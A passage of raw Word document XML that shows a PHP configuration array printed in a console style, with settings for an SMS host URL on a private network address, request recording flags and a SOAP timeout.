            </w:r>
          </w:p>
          <w:p w14:paraId="53BA4540" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSHost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BFF90C7"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661E4AF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSHost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="748EBE80" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="232F25CB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62C9A8CC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 40,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5D81F5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'SMS Host',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="374F8AC4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="018B574D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'https://192.168.5.85',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A0CD22" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08EA78FB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="262FFC25" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E8CB72"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12D18A24" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BAD43A0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1107FB9D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4C6922" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="606A38E8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Record Request',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66160A59" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7697F203" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E2C5CB1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46ECD907" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="074EBC82" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordResultData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A28E55"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13B3B2D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordResultData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="385A278E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75AC563D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F755253" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E43736" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Record Result Data',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0826CC3E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53760DCA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72FBCFBE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="415DA6FB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40DBC7DF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_Timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A8F83F0"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EC5646D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_Timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75AAAC6B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FA58AC5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC971D1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 4,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57205F5A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'SOAP Request Timeout (Seconds)',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF6E66D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DF29833" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '30',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC5A3A3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F236626" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C12BA03" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3576E8D2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_tpl_methods</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DCE9110" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689FE54E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          0 =&gt; 'label',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="592CE103" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          1 =&gt; 'input',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29C11DB6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          2 =&gt; 'select',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="709D9EFD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          3 =&gt; 'value',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E941E0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          4 =&gt; 'radio',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="349112DB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          5 =&gt; 'checkbox',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C8D254A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          6 =&gt; 'text',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDC5789" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5916D977" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA19AFF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_listIndex</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC410A3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_fld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02BF1B8E"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890BDFF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Result',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63D5CE4E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C58820C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A81B591" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D1F3FC9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Response',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22DEE022" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B493139" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F22C61" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
